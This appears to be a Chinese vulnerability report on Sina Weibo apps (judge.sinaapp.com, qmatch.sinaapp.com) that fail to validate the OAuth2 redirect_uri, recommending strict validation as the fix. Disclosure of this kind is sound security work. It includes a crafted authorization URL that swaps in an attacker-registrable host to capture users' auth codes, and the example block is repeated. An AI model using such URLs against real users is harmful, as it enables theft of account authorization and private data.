新浪微博很多应用有数量众多的用户,judge.sinaapp.com和qmatch.sinaapp.com等都是微博中用户量较大的应用,现在仍然存在Oauth2的漏洞,可造成用户隐私泄露等问题。
以judge.sinaapp.com为例
新浪授权页面
https://api.weibo.com/oauth2/authorize?client_id=2988081241&redirect_uri=http://judge.sinaapp.com/callback?next=http://judge.sinaapp.com&response_type=code&forcelogin=true&scope=follow_app_official_microblog
可以将该页面judge进行替换,例如
https://api.weibo.com/oauth2/authorize?client_id=2988081241&redirect_uri=http://xxxx.sinaapp.com/callback?next=http://judge.sinaapp.com&response_type=code&forcelogin=true&scope=follow_app_official_microblog
最终用户的认证信息就会发送到恶意用户的xxxx.sinaapp.com,xxxx.sinaapp.com可由任意用户注册,qmatch.sinaapp.com与此类似,此外还有大量微博应用存在这个问题。
以judge.sinaapp.com为例
新浪授权页面
https://api.weibo.com/oauth2/authorize?client_id=2988081241&redirect_uri=http://judge.sinaapp.com/callback?next=http://judge.sinaapp.com&response_type=code&forcelogin=true&scope=follow_app_official_microblog
可以将该页面judge进行替换,例如
https://api.weibo.com/oauth2/authorize?client_id=2988081241&redirect_uri=http://xxxx.sinaapp.com/callback?next=http://judge.sinaapp.com&response_type=code&forcelogin=true&scope=follow_app_official_microblog
终用户的认证信息就会发送到恶意用户的xxxx.sinaapp.com,qmatch.sinaapp.com与此类似,此外还有大量应用存在此问题。
修复方案:
严格认证redirect_uri
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;